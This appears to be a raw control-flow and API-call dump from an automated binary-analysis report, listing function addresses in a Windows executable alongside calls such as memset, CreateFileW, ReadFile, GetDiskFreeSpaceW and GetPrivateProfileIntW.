API calls 40474->40646 40478 43ace1 40647 439811 164 API calls 40478->40647 40479 43a9f6 162 API calls 40479->40480 40480->40456 40480->40466 40480->40479 40641 439bbb 22 API calls 40480->40641 40482 43acfd 40487 43ad2c 40482->40487 40648 438eed 16 API calls 40482->40648 40484 43ad19 40649 4233c5 16 API calls 40484->40649 40486 43ad58 40650 44081d 164 API calls 40486->40650 40487->40486 40490 43add9 40487->40490 40654 423426 11 API calls 40490->40654 40491 43ae3a memset 40492 43ae73 40491->40492 40655 42e1c0 148 API calls 40492->40655 40493 43adab 40652 438c4e 164 API calls 40493->40652 40494 43ad6c 40494->40456 40494->40493 40651 42370b memset memcpy memset 40494->40651 40498 43adcc 40653 440f84 12 API calls 40498->40653 40499 43ae96 40656 42e1c0 148 API calls 40499->40656 40502 43aea8 40503 43aec1 40502->40503 40657 42e199 148 API calls 40502->40657 40504 43af00 40503->40504 40658 42e1c0 148 API calls 40503->40658 40504->40456 40508 43af1a 40504->40508 40509 43b3d9 40504->40509 40659 438eed 16 API calls 40508->40659 40514 43b3f6 40509->40514 40515 43b4c8 40509->40515 40510 43b60f 40510->40456 40718 4393a5 17 API calls 40510->40718 40513 43af2f 40660 4233c5 16 API calls 40513->40660 40700 432878 12 API calls 40514->40700 40519 43b4f2 40515->40519 40706 42bbd5 memcpy memcpy memcpy memset memcpy 40515->40706 40517 43af51 40661 423426 11 API calls 40517->40661 40707 43a76c 21 API calls 40519->40707 40521 43af7d 40662 423426 11 API calls 40521->40662 40525 43b529 40708 44081d 164 API calls 40525->40708 40526 43b462 40702 423330 11 API calls 40526->40702 40527 43af94 40663 423330 11 API calls 40527->40663 40531 43afca 40664 423330 11 API calls 40531->40664 40532 43b47e 40536 43b497 40532->40536 40703 42374a memcpy memset memcpy memcpy memcpy 40532->40703 40533 43b544 40537 43b55c 40533->40537 40709 42c02e memset 40533->40709 40534 43b428 40534->40526 40701 432b60 16 API calls 40534->40701 40704 4233ae 11 API calls 40536->40704 40710 43a87a 164 API calls 40537->40710 40539 43afdb 40665 4233ae 11 API calls 40539->40665 40544 43b56c 40548 43b58a 40544->40548 40711 423330 11 API calls 40544->40711 40545 43b4b1 40705 423399 11 API calls 40545->40705 40547 43afee 40666 44081d 164 API calls 40547->40666 40712 440f84 12 API calls 40548->40712 40549 43b4c1 40714 42db80 164 API calls 40549->40714 40554 43b592 40713 43a82f 16 API calls 40554->40713 40557 43b5b4 40715 438c4e 164 API calls 40557->40715 40559 43b5cf 40716 42c02e memset 40559->40716 40561 43b005 40561->40456 40565 43b01f 40561->40565 40667 42d836 164 API calls 40561->40667 40562 43b1ef 40677 4233c5 16 API calls 40562->40677 40565->40562 40675 423330 11 API calls 40565->40675 40676 42d71d 164 API calls 40565->40676 40566 43b212 40678 423330 11 API calls 40566->40678 40568 43b087 40668 4233ae 11 API calls 40568->40668 40569 43add4 40569->40510 40717 438f86 16 API calls 40569->40717 40572 43b22a 40679 42ccb5 11 API calls 40572->40679 40575 43b23f 40680 4233ae 11 API calls 40575->40680 40576 43b10f 40671 423330 11 API calls 40576->40671 40578 43b257 40681 4233ae 11 API calls 40578->40681 40582 43b129 40672 4233ae 11 API calls 40582->40672 40583 43b26e 40682 4233ae 11 API calls 40583->40682 40586 43b09a 40586->40576 40669 42cc15 19 API calls 40586->40669 40670 4233ae 11 API calls 40586->40670 40587 43b282 40683 43a87a 164 API calls 40587->40683 40589 43b13c 40673 440f84 12 API calls 40589->40673 40591 43b29d 40684 423330 11 API calls 40591->40684 40594 43b15f 40674 4233ae 11 API calls 40594->40674 40595 43b2af 40596 43b2b8 40595->40596 40597 43b2ce 40595->40597 40685 4233ae 11 API calls 40596->40685 40686 440f84 12 API calls 40597->40686 40601 43b2c9 40688 4233ae 11 API calls 40601->40688 40602 43b2da 40687 42370b memset memcpy memset 40602->40687 40605 43b2f9 40689 423330 11 API calls 40605->40689 40607 43b30b 40690 423330 11 API calls 40607->40690 40609 43b325 40691 423399 11 API calls 40609->40691 40611 43b332 40692 4233ae 11 API calls 40611->40692 40613 43b354 40693 423399 11 API calls 40613->40693 40615 43b364 40694 43a82f 16 API calls 40615->40694 40617 43b370 40695 42db80 164 API calls 40617->40695 40619 43b380 40696 438c4e 164 API calls 40619->40696 40621 43b39e 40697 423399 11 API calls 40621->40697 40623 43b3ae 40698 43a76c 21 API calls 40623->40698 40625 43b3c3 40699 423399 11 API calls 40625->40699 40627->40448 40628->40452 40629->40451 40631 43a6f5 40630->40631 40634 43a765 40630->40634 40631->40634 40719 42a115 40631->40719 40634->40456 40639 4397fd memset 40634->40639 40636 43a73d 40636->40634 40637 42a115 148 API calls 40636->40637 40637->40634 40638->40458 40639->40465 40640->40456 40641->40480 40642->40469 40643->40473 40644->40470 40645->40474 40646->40478 40647->40482 40648->40484 40649->40487 40650->40494 40651->40493 40652->40498 40653->40569 40654->40491 40655->40499 40656->40502 40657->40503 40658->40503 40659->40513 40660->40517 40661->40521 40662->40527 40663->40531 40664->40539 40665->40547 40666->40561 40667->40568 40668->40586 40669->40586 40670->40586 40671->40582 40672->40589 40673->40594 40674->40565 40675->40565 40676->40565 40677->40566 40678->40572 40679->40575 40680->40578 40681->40583 40682->40587 40683->40591 40684->40595 40685->40601 40686->40602 40687->40601 40688->40605 40689->40607 40690->40609 40691->40611 40692->40613 40693->40615 40694->40617 40695->40619 40696->40621 40697->40623 40698->40625 40699->40569 40700->40534 40701->40526 40702->40532 40703->40536 40704->40545 40705->40549 40706->40519 40707->40525 40708->40533 40709->40537 40710->40544 40711->40548 40712->40554 40713->40549 40714->40557 40715->40559 40716->40569 40717->40510 40718->40456 40720 42a175 40719->40720 40722 42a122 40719->40722 40720->40634 40725 42b13b 148 API calls 40720->40725 40722->40720 40723 42a115 148 API calls 40722->40723 40726 43a174 40722->40726 40750 42a0a8 148 API calls 40722->40750 40723->40722 40725->40636 40740 43a196 40726->40740 40741 43a19e 40726->40741 40727 43a306 40727->40740 40759 4388c4 14 API calls 40727->40759 40730 42a115 148 API calls 40730->40741 40731 415a91 memset 40731->40741 40732 43a642 40732->40740 40773 4169a7 11 API calls 40732->40773 40734 4165ff 11 API calls 40734->40741 40736 43a635 40772 42c02e memset 40736->40772 40740->40722 40741->40727 40741->40730 40741->40731 40741->40734 40741->40740 40751 42ff8c 40741->40751 40767 439504 13 API calls 40741->40767 40768 4312d0 148 API calls 40741->40768 40769 42be4c memcpy memcpy memcpy memset memcpy 40741->40769 40770 43a121 11 API calls 40741->40770 40743 43a325 40743->40732 40743->40736 40743->40740 40744 4169a7 11 API calls 40743->40744 40745 42b5b5 memset memcpy 40743->40745 40746 42bf4c 14 API calls 40743->40746 40749 4165ff 11 API calls 40743->40749 40760 42b63e 40743->40760 40771 42bfcf memcpy 40743->40771 40744->40743 40745->40743 40746->40743 40749->40743 40750->40722 40752 43817e 140 API calls 40751->40752 40754 42ff99 40752->40754 40753 42ff9d 40753->40741 40754->40753 40755 42ffe3 40754->40755 40756 42ffd0 40754->40756 40775 4169a7 11 API calls 40755->40775 40774 4169a7 11 API calls 40756->40774 40759->40743 40776 42b4ec 40760->40776 40762 42b64c 40782 42b5e4 memset 40762->40782 40764 42b65e 40765 42b66d 40764->40765 40783 42b3c6 11 API calls 40764->40783 40765->40743 40767->40741 40768->40741 40769->40741 40770->40741 40771->40743 40772->40732 40773->40740 40774->40753 40775->40753 40777 42b4ff 40776->40777 40778 415a91 memset 40777->40778 40779 42b52c 40778->40779 40780 42b553 memcpy 40779->40780 40781 42b545 40779->40781 40780->40781 40781->40762 40782->40764 40783->40765 40803 41493c EnumResourceNamesW 37675 4287c1 37676 4287d2 37675->37676 37677 429ac1 37675->37677 37678 428818 37676->37678 37679 42881f 37676->37679 37700 425711 37676->37700 37689 425ad6 37677->37689 37745 415c56 11 API calls 37677->37745 37712 42013a 37678->37712 37740 420244 97 API calls 37679->37740 37684 4260dd 37739 424251 120 API calls 37684->37739 37686 4259da 37738 416760 11 API calls 37686->37738 37692 422aeb memset memcpy memcpy 37692->37700 37693 429a4d 37694 429a66 37693->37694 37698 429a9b 37693->37698 37741 415c56 11 API calls 37694->37741 37696 4260a1 37737 415c56 11 API calls 37696->37737 37699 429a96 37698->37699 37743 416760 11 API calls 37698->37743 37744 424251 120 API calls 37699->37744 37700->37677 37700->37686 37700->37692 37700->37693 37700->37696 37708 4259c2 37700->37708 37711 425a38 37700->37711 37728 4227f0 memset memcpy 37700->37728 37729 422b84 15 API calls 37700->37729 37730 422b5d memset memcpy memcpy 37700->37730 37731 422640 13 API calls 37700->37731 37733 4241fc 11 API calls 37700->37733 37734 42413a 90 API calls 37700->37734 37703 429a7a 37742 416760 11 API calls 37703->37742 37708->37689 37732 415c56 11 API calls 37708->37732 37711->37708 37735 422640 13 API calls 37711->37735 37736 4226e0 12 API calls 37711->37736 37713 42014c 37712->37713 37716 420151 37712->37716 37755 41e466 97 API calls 37713->37755 37715 420162 37715->37700 37716->37715 37717 4201b3 37716->37717 37718 420229 37716->37718 37719 4201b8 37717->37719 37720 4201dc 37717->37720 37718->37715 37721 41fd5e 86 API calls 37718->37721 37746 41fbdb 37719->37746 37720->37715 37724 4201ff 37720->37724 37752 41fc4c 37720->37752 37721->37715 37724->37715 37727 42013a 97 API calls 37724->37727 37727->37715 37728->37700 37729->37700 37730->37700 37731->37700 37732->37686 37733->37700 37734->37700 37735->37711 37736->37711 37737->37686 37738->37684 37739->37689 37740->37700 37741->37703 37742->37699 37743->37699 37744->37677 37745->37686 37747 41fbf8 37746->37747 37750 41fbf1 37746->37750 37760 41ee26 37747->37760 37751 41fc39 37750->37751 37770 4446ce 11 API calls 37750->37770 37751->37715 37756 41fd5e 37751->37756 37753 41ee6b 86 API calls 37752->37753 37754 41fc5d 37753->37754 37754->37720 37755->37716 37758 41fd65 37756->37758 37757 41fdab 37757->37715 37758->37757 37759 41fbdb 86 API calls 37758->37759 37759->37758 37761 41ee41 37760->37761 37762 41ee32 37760->37762 37771 41edad 37761->37771 37774 4446ce 11 API calls 37762->37774 37765 41ee3c 37765->37750 37768 41ee58 37768->37765 37776 41ee6b 37768->37776 37770->37751 37780 41be52 37771->37780 37774->37765 37775 41eb85 11 API calls 37775->37768 37777 41ee70 37776->37777 37778 41ee78 37776->37778 37836 41bf99 86 API calls 37777->37836 37778->37765 37781 41be6f 37780->37781 37782 41be5f 37780->37782 37788 41be8c 37781->37788 37801 418c63 37781->37801 37815 4446ce 11 API calls 37782->37815 37785 41be69 37785->37765 37785->37775 37786 41bee7 37786->37785 37819 41a453 86 API calls 37786->37819 37788->37785 37788->37786 37789 41bf3a 37788->37789 37793 41bed1 37788->37793 37818 4446ce 11 API calls 37789->37818 37791 41bef0 37791->37786 37792 41bf01 37791->37792 37794 41bf24 memset 37792->37794 37796 41bf14 37792->37796 37816 418a6d memset memcpy memset 37792->37816 37793->37791 37795 41bee2 37793->37795 37794->37785 37805 41ac13 37795->37805 37817 41a223 memset memcpy memset 37796->37817 37800 41bf20 37800->37794 37804 418c72 37801->37804 37802 418c94 37802->37788 37803 418d51 memset memset 37803->37802 37804->37802 37804->37803 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37820 41dc14 19 API calls 37806->37820 37808 41acd9 37807->37808 37808->37786 37812 41aca1 37810->37812 37821 41519d 37810->37821 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37785 37816->37796 37817->37800 37818->37786 37820->37810 37824 4175ed 37821->37824 37832 417570 SetFilePointer 37824->37832 37827 41760a ReadFile 37828 417637 37827->37828 37829 417627 GetLastError 37827->37829 37830 4151b3 37828->37830 37831 41763e memset 37828->37831 37829->37830 37830->37812 37831->37830 37833 4175b2 37832->37833 37834 41759c GetLastError 37832->37834 37833->37827 37833->37830 37834->37833 37835 4175a8 GetLastError 37834->37835 37835->37833 37836->37778 37837 417bc5 37839 417c61 37837->37839 37843 417bda 37837->37843 37838 417bf6 UnmapViewOfFile CloseHandle 37838->37838 37838->37843 37841 417c2c 37841->37843 37849 41851e 20 API calls 37841->37849 37843->37838 37843->37839 37843->37841 37844 4175b7 37843->37844 37845 4175d6 FindCloseChangeNotification 37844->37845 37846 4175c8 37845->37846 37847 4175df 37845->37847 37846->37847 37848 4175ce Sleep 37846->37848 37847->37843 37848->37845 37849->37841 37881 4415ea 37889 4304b2 37881->37889 37883 4415fe 37884 4418ea 37883->37884 37885 442bd4 37883->37885 37886 4418e2 37883->37886 37885->37884 37937 441409 memset 37885->37937 37886->37884 37936 4414a9 12 API calls 37886->37936 37938 43041c 12 API calls 37889->37938 37891 4304cd 37896 430557 37891->37896 37939 43034a 37891->37939 37893 4304f3 37893->37896 37943 430468 11 API calls 37893->37943 37895 430506 37895->37896 37897 43057b 37895->37897 37944 43817e 37895->37944 37896->37883 37949 415a91 37897->37949 37902 4305e4 37902->37896 37954 4328e4 12 API calls 37902->37954 37904 43052d 37904->37896 37904->37897 37907 430542 37904->37907 37906 4305fa 37908 430609 37906->37908 37955 423383 11 API calls 37906->37955 37907->37896 37948 4169a7 11 API calls 37907->37948 37956 423330 11 API calls 37908->37956 37911 430634 37957 423399 11 API calls 37911->37957 37913 430648 37958 4233ae 11 API calls 37913->37958 37915 43066b 37959 423330 11 API calls 37915->37959 37917 43067d 37960 4233ae 11 API calls 37917->37960 37919 430695 37961 423330 11 API calls 37919->37961 37921 4306d6 37963 423330 11 API calls 37921->37963 37922 4306a7 37922->37921 37924 4306c0 37922->37924 37962 4233ae 11 API calls 37924->37962 37925 4306d1 37964 430369 17 API calls 37925->37964 37928 4306f3 37965 423330 11 API calls 37928->37965 37930 430704 37966 423330 11 API calls 37930->37966 37932 430710 37967 423330 11 API calls 37932->37967 37934 43071e 37968 423383 11 API calls 37934->37968 37936->37884 37937->37885 37938->37891 37940 43034e 37939->37940 37942 430359 37939->37942 37969 415c23 memcpy 37940->37969 37942->37893 37943->37895 37945 438187 37944->37945 37947 438192 37944->37947 37970 4380f6 37945->37970 37947->37904 37948->37896 37950 415a9d 37949->37950 37951 415ab3 37950->37951 37952 415aa4 memset 37950->37952 37951->37896 37953 4397fd memset 37951->37953 37952->37951 37953->37902 37954->37906 37955->37908 37956->37911 37957->37913 37958->37915 37959->37917 37960->37919 37961->37922 37962->37925 37963->37925 37964->37928 37965->37930 37966->37932 37967->37934 37968->37896 37969->37942 37972 43811f 37970->37972 37971 438164 37971->37947 37972->37971 37975 437e5e 37972->37975 37998 4300e8 37972->37998 38006 437d3c 37975->38006 37977 437eb3 37977->37972 37978 437ea9 37978->37977 37983 437f22 37978->37983 38021 41f432 37978->38021 37981 437f06 38072 415c56 11 API calls 37981->38072 37985 437f7f 37983->37985 38073 432d4e 37983->38073 37984 437f95 38077 415c56 11 API calls 37984->38077 37985->37984 37988 43802b 37985->37988 38032 4165ff 37988->38032 37993 43806b 37994 438094 37993->37994 38078 42f50e 139 API calls 37993->38078 37996 437fa3 37994->37996 37997 4300e8 3 API calls 37994->37997 37996->37977 38079 41f638 104 API calls 37996->38079 37997->37996 37999 430128 37998->37999 38002 4300fa 37998->38002 38001 430196 memset 37999->38001 38003 4301bc 38001->38003 38005 4301de 38001->38005 38002->37999 38002->38005 38516 432f8c 38002->38516 38004 4301c9 memcpy 38003->38004 38003->38005 38004->38005 38005->37972 38007 437d69 38006->38007 38010 437d80 38006->38010 38092 437ccb 11 API calls 38007->38092 38009 437d76 38009->37978 38010->38009 38011 437da3 38010->38011 38013 437d90 38010->38013 38080 438460 38011->38080 38013->38009 38096 437ccb 11 API calls 38013->38096 38015 437de8 38095 424f26 123 API calls 38015->38095 38017 437dcb 38017->38015 38093 444283 13 API calls 38017->38093 38019 437dfc 38094 437ccb 11 API calls 38019->38094 38022 41f54d 38021->38022 38028 41f44f 38021->38028 38023 41f466 38022->38023 38290 41c635 memset memset 38022->38290 38023->37981 38023->37983 38028->38023 38030 41f50b 38028->38030 38261 41f1a5 38028->38261 38286 41c06f memcmp 38028->38286 38287 41f3b1 90 API calls 38028->38287 38288 41f398 86 API calls 38028->38288 38030->38022 38030->38023 38289 41c295 86 API calls 38030->38289 38033 4165a0 11 API calls 38032->38033 38034 41660d 38033->38034 38035 437371 38034->38035 38036 41703f 11 API calls 38035->38036 38037 437399 38036->38037 38038 43739d 38037->38038 38040 4373ac 38037->38040 38396 4446ea 11 API calls 38038->38396 38041 416935 16 API calls 38040->38041 38042 4373ca 38041->38042 38043 438460 134 API calls 38042->38043 38052 415a91 memset 38042->38052 38055 43758f 38042->38055 38067 437584 38042->38067 38071 437d3c 135 API calls 38042->38071 38377 4251c4 38042->38377 38395 415304 ??3@YAXPAX 38042->38395 38397 425433 13 API calls 38042->38397 38398 425413 38042->38398 38405 42533e 38042->38405 38409 42538f 38042->38409 38413 42453e 123 API calls 38042->38413 38043->38042 38044 4375bc 38046 415c7d 16 API calls 38044->38046 38047 4375d2 38046->38047 38069 4373a7 38047->38069 38416 4442e6 38047->38416 38050 4375e2 38050->38069 38423 444283 13 API calls 38050->38423 38052->38042 38414 42453e 123 API calls 38055->38414 38058 4375f4 38061 437620 38058->38061 38062 43760b 38058->38062 38060 43759f 38063 416935 16 API calls 38060->38063 38065 416935 16 API calls 38061->38065 38424 444283 13 API calls 38062->38424 38063->38067 38065->38069 38067->38044 38415 42453e 123 API calls 38067->38415 38068 437612 memcpy 38068->38069 38069->37993 38071->38042 38072->37977 38074 432d65 38073->38074 38075 432d58 38073->38075 38074->37985 38515 432cc4 memset memset memcpy 38075->38515 38077->37996 38078->37994 38079->37977 38097 41703f 38080->38097 38082 43847a 38083 43848a 38082->38083 38084 43847e 38082->38084 38104 438270 38083->38104 38134 4446ea 11 API calls 38084->38134 38088 438488 38088->38017 38090 4384bb 38091 438270 134 API calls 38090->38091 38091->38088 38092->38009 38093->38019 38094->38015 38095->38009 38096->38009 38098 417044 38097->38098 38099 41705c 38097->38099 38103 417055 38098->38103 38136 416760 11 API calls 38098->38136 38100 417075 38099->38100 38137 41707a 38099->38137 38100->38082 38103->38082 38105 415a91 memset 38104->38105 38106 43828d 38105->38106 38107 438297 38106->38107 38108 438341 38106->38108 38110 4382d6 38106->38110 38109 415c7d 16 API calls 38107->38109 38143 44358f 38108->38143 38112 438458 38109->38112 38113 4382fb 38110->38113 38114 4382db 38110->38114 38112->38088 38135 424f26 123 API calls 38112->38135 38186 415c23 memcpy 38113->38186 38174 416935 38114->38174 38117 438305 38121 44358f 19 API calls 38117->38121 38123 438318 38117->38123 38118 4382e9 38182 415c7d 38118->38182 38120 438373 38124 4300e8 3 API calls 38120->38124 38127 438383 38120->38127 38121->38123 38123->38120 38169 43819e 38123->38169 38124->38127 38125 4383f5 38130 438404 38125->38130 38131 43841c 38125->38131 38126 4383cd 38126->38125 38188 42453e 123 API calls 38126->38188 38127->38126 38187 415c23 memcpy 38127->38187 38133 416935 16 API calls 38130->38133 38132 416935 16 API calls 38131->38132 38132->38107 38133->38107 38134->38088 38135->38090 38136->38103 38138 417085 38137->38138 38139 4170ab 38137->38139 38138->38139 38142 416760 11 API calls 38138->38142 38139->38098 38141 4170a4 38141->38098 38142->38141 38144 4435be 38143->38144 38145 443676 38144->38145 38150 4436ce 38144->38150 38153 44366c 38144->38153 38167 44360c 38144->38167 38189 442ff8 38144->38189 38146 443758 38145->38146 38149 442ff8 19 API calls 38145->38149 38152 443737 38145->38152 38158 443775 38146->38158 38198 441409 memset 38146->38198 38148 442ff8 19 API calls 38148->38146 38149->38152 38155 4165ff 11 API calls 38150->38155 38152->38148 38197 4169a7 11 API calls 38153->38197 38154 4437be 38159 4437de 38154->38159 38200 416760 11 API calls 38154->38200 38155->38145 38158->38154 38199 415c56 11 API calls 38158->38199 38161 443801 38159->38161 38201 42463b memset memcpy 38159->38201 38160 443826 38212 43bd08 memset 38160->38212 38161->38160 38202 43024d 38161->38202 38166 443837 38166->38167 38168 43024d memset 38166->38168 38167->38123 38168->38166 38170 438246 38169->38170 38172 4381ba 38169->38172 38170->38120 38171 41f432 110 API calls 38171->38172 38172->38170 38172->38171 38239 41f638 104 API calls 38172->38239 38175 41693e 38174->38175 38177 41698e 38174->38177 38178 41694c 38175->38178 38240 422fd1 memset 38175->38240 38177->38118 38178->38177 38241 4165a0 38178->38241 38183 415c81 38182->38183 38185 415c9c 38182->38185 38184 416935 16 API calls 38183->38184 38183->38185 38184->38185 38185->38107 38186->38117 38187->38126 38188->38125 38195 442ffe 38189->38195 38190 443094 38227 4414a9 12 API calls 38190->38227 38192 443092 38192->38144 38195->38190 38195->38192 38213 4414ff 38195->38213 38225 4169a7 11 API calls 38195->38225 38226 441325 memset 38195->38226 38197->38145 38198->38146 38199->38154 38200->38159 38201->38161 38203 4302f9 38202->38203 38208 43025c 38202->38208 38203->38160 38204 4302cd 38228 435ef3 38204->38228 38208->38203 38208->38204 38237 4172c8 memset 38208->38237 38210 4302dc 38238 4386af memset 38210->38238 38212->38166 38214 441539 38213->38214 38216 441547 38213->38216 38215 441575 38214->38215 38214->38216 38217 441582 38214->38217 38219 42fccf 18 API calls 38215->38219 38218 4418e2 38216->38218 38222 442bd4 38216->38222 38220 43275a 12 API calls 38217->38220 38221 4414a9 12 API calls 38218->38221 38223 4418ea 38218->38223 38219->38216 38220->38216 38221->38223 38222->38223 38224 441409 memset 38222->38224 38223->38195 38224->38222 38225->38195 38226->38195 38227->38192 38230 435f03 38228->38230 38232 4302d4 38228->38232 38229 435533 memset 38229->38230 38230->38229 38231 4172c8 memset 38230->38231 38230->38232 38231->38230 38233 4301e7 38232->38233 38234 43023c 38233->38234 38236 4301f5 38233->38236 38234->38210 38235 42b896 memset 38235->38236 38236->38234 38236->38235 38237->38208 38238->38203 38239->38172 38240->38178 38247 415cfe 38241->38247 38246 422b84 15 API calls 38246->38177 38252 415d23 38247->38252 38254 41628e 38247->38254 38248 4163ca 38249 416422 10 API calls 38248->38249 38249->38254 38250 416422 10 API calls 38250->38252 38251 416172 memset 38251->38252 38252->38248 38252->38250 38252->38251 38253 415cb9 10 API calls 38252->38253 38252->38254 38253->38252 38255 416520 38254->38255 38256 416527 38255->38256 38260 416574 38255->38260 38257 415700 10 API calls 38256->38257 38258 416544 38256->38258 38256->38260 38257->38258 38259 416561 memcpy 38258->38259 38258->38260 38259->38260 38260->38177 38260->38246 38291 41bc3b 38261->38291 38264 41edad 86 API calls 38265 41f1cb 38264->38265 38266 41f1f5 memcmp 38265->38266 38267 41f20e 38265->38267 38271 41f282 38265->38271 38266->38267 38268 41f21b memcmp 38267->38268 38267->38271 38269 41f326 38268->38269 38272 41f23d 38268->38272 38270 41ee6b 86 API calls 38269->38270 38269->38271 38270->38271 38271->38028 38272->38269 38273 41f28e memcmp 38272->38273 38315 41c8df 56 API calls 38272->38315 38273->38269 38274 41f2a9 38273->38274 38274->38269 38277 41f308 38274->38277 38278 41f2d8 38274->38278 38276 41f269 38276->38269 38279 41f287 38276->38279 38280 41f27a 38276->38280 38277->38269 38317 4446ce 11 API calls 38277->38317 38281 41ee6b 86 API calls 38278->38281 38279->38273 38282 41ee6b 86 API calls 38280->38282 38283 41f2e0 38281->38283 38282->38271 38316 41b1ca memset 38283->38316 38286->38028 38287->38028 38288->38028 38289->38022 38290->38023 38292 41bc54 38291->38292 38300 41be0b 38291->38300 38294 41bd61 38292->38294 38292->38300 38304 41bc8d 38292->38304 38318 41baf0 55 API calls 38292->38318 38296 41be45 38294->38296 38327 41a25f memset 38294->38327 38296->38264 38296->38271 38298 41be04 38325 41aee4 56 API calls 38298->38325 38300->38294 38326 41ae17 34 API calls 38300->38326 38301 41bd42 38301->38294 38301->38298 38302 41bdd8 memset 38301->38302 38303 41bdba 38301->38303 38305 41bde7 memcmp 38302->38305 38314 4175ed 6 API calls 38303->38314 38304->38294 38304->38301 38306 41bd18 38304->38306 38319 4151e3 38304->38319 38305->38298 38308 41bdfd 38305->38308 38306->38294 38306->38301 38323 41a9da 86 API calls 38306->38323 38307 41bdcc 38307->38294 38307->38305 38324 41a1b0 memset 38308->38324 38314->38307 38315->38276 38316->38271 38317->38269 38318->38304 38328 41837f 38319->38328 38322 444706 11 API calls 38322->38306 38323->38301 38324->38298 38325->38300 38326->38294 38327->38296 38329 4183c1 38328->38329 38330 4183ca 38328->38330 38375 418197 25 API calls 38329->38375 38333 4151f9 38330->38333 38349 418160 38330->38349 38333->38306 38333->38322 38334 4183e5 38334->38333 38358 41739b 38334->38358 38337 418444 CreateFileW 38339 418477 38337->38339 38338 41845f CreateFileA 38338->38339 38340 4184c2 memset 38339->38340 38341 41847e GetLastError ??3@YAXPAX 38339->38341 38361 418758 38340->38361 38342 4184b5 38341->38342 38343 418497 38341->38343 38376 444706 11 API calls 38342->38376 38345 41837f 49 API calls 38343->38345 38345->38333 38350 41739b GetVersionExW 38349->38350 38351 418165 38350->38351 38353 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38351->38353 38354 418178 38353->38354 38355 41817f 38354->38355 38356 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38354->38356 38355->38334 38357 418188 ??3@YAXPAX 38356->38357 38357->38334 38359 4173d6 38358->38359 38360 4173ad GetVersionExW 38358->38360 38359->38337 38359->38338 38360->38359 38362 418680 43 API calls 38361->38362 38363 418782 38362->38363 38364 418506 ??3@YAXPAX 38363->38364 38365 418160 11 API calls 38363->38365 38364->38333 38366 418799 38365->38366 38366->38364 38367 41739b GetVersionExW 38366->38367 38368 4187a7 38367->38368 38369 4187da 38368->38369 38370 4187ad GetDiskFreeSpaceW 38368->38370 38372 4187ec GetDiskFreeSpaceA 38369->38372 38374 4187e8 38369->38374 38373 418800 ??3@YAXPAX 38370->38373 38372->38373 38373->38364 38374->38372 38375->38330 38376->38333 38425 424f07 38377->38425 38379 4251e4 38380 4251f7 38379->38380 38381 4251e8 38379->38381 38433 4250f8 38380->38433 38432 4446ea 11 API calls 38381->38432 38383 4251f2 38383->38042 38385 425209 38388 425249 38385->38388 38391 4250f8 127 API calls 38385->38391 38392 425287 38385->38392 38441 4384e9 135 API calls 38385->38441 38442 424f74 124 API calls 38385->38442 38386 415c7d 16 API calls 38386->38383 38388->38392 38443 424ff0 38388->38443 38391->38385 38392->38386 38393 425266 38393->38392 38446 415be9 memcpy 38393->38446 38395->38042 38396->38069 38397->38042 38399 42533e 16 API calls 38398->38399 38400 42541f 38399->38400 38401 424ff0 13 API calls 38400->38401 38402 425425 38401->38402 38403 42538f 16 API calls 38402->38403 38404 42542d 38403->38404 38404->38042 38406 425345 38405->38406 38407 425357 38405->38407 38406->38407 38408 416935 16 API calls 38406->38408 38407->38042 38408->38407 38410 425394 38409->38410 38411 42539e 38409->38411 38412 415c7d 16 API calls 38410->38412 38411->38042 38412->38411 38413->38042 38414->38060 38415->38044 38417 4442eb 38416->38417 38420 444303 38416->38420 38418 41707a 11 API calls 38417->38418 38419 4442f2 38418->38419 38419->38420 38514 4446ea 11 API calls 38419->38514 38420->38050 38422 444300 38422->38050 38423->38058 38424->38068 38426 424f1f 38425->38426 38427 424f0c 38425->38427 38448 424eea 11 API calls 38426->38448 38447 416760 11 API calls 38427->38447 38430 424f18 38430->38379 38431 424f24 38431->38379 38432->38383 38434 425108 38433->38434 38440 42510d 38433->38440 38481 424f74 124 API calls 38434->38481 38437 42516e 38439 415c7d 16 API calls 38437->38439 38438 425115 38438->38385 38439->38438 38440->38438 38449 42569b 38440->38449 38441->38385 38442->38385 38499 422f5c 38443->38499 38446->38392 38447->38430 38448->38431 38450 4256f1 38449->38450 38477 4259c2 38449->38477 38456 4259da 38450->38456 38460 422aeb memset memcpy memcpy 38450->38460 38461 429a4d 38450->38461 38465 4260a1 38450->38465 38475 429ac1 38450->38475 38450->38477 38480 425a38 38450->38480 38482 4227f0 memset memcpy 38450->38482 38483 422b84 15 API calls 38450->38483 38484 422b5d memset memcpy memcpy 38450->38484 38485 422640 13 API calls 38450->38485 38487 4241fc 11 API calls 38450->38487 38488 42413a 90 API calls 38450->38488 38455 4260dd 38493 424251 120 API calls 38455->38493 38492 416760 11 API calls 38456->38492 38460->38450 38462 429a66 38461->38462 38463 429a9b 38461->38463 38494 415c56 11 API calls 38462->38494 38467 429a96 38463->38467 38496 416760 11 API calls 38463->38496 38491 415c56 11 API calls 38465->38491 38497 424251 120 API calls 38467->38497 38470 429a7a 38495 416760 11 API calls 38470->38495 38476 425ad6 38475->38476 38498 415c56 11 API calls 38475->38498 38476->38437 38477->38476 38486 415c56 11 API calls 38477->38486 38480->38477 38489 422640 13 API calls 38480->38489 38490 4226e0 12 API calls 38480->38490 38481->38440 38482->38450 38483->38450 38484->38450 38485->38450 38486->38456 38487->38450 38488->38450 38489->38480 38490->38480 38491->38456 38492->38455 38493->38476 38494->38470 38495->38467 38496->38467 38497->38475 38498->38456 38500 422f66 38499->38500 38507 422fb6 38499->38507 38501 422f8b 38500->38501 38500->38507 38510 422693 13 API calls 38500->38510 38503 422f95 38501->38503 38504 422fb8 38501->38504 38509 422fab 38503->38509 38511 422640 13 API calls 38503->38511 38513 422726 12 API calls 38504->38513 38507->38393 38509->38507 38512 4226e0 12 API calls 38509->38512 38510->38501 38511->38509 38512->38507 38513->38507 38514->38422 38515->38074 38518 432fc6 38516->38518 38519 432fdd 38518->38519 38522 43bd08 memset 38518->38522 38520 43024d memset 38519->38520 38521 43300e 38519->38521 38520->38519 38521->38002 38522->38518 40420 4147f3 40423 414561 40420->40423 40422 414813 40424 41456d 40423->40424 40425 41457f GetPrivateProfileIntW 40423->40425 40428 4143f1 memset _itow WritePrivateProfileStringW 40424->40428 40425->40422 40427 41457a 40427->40422 40428->40427

                                                                                                                                                Control-flow Graph

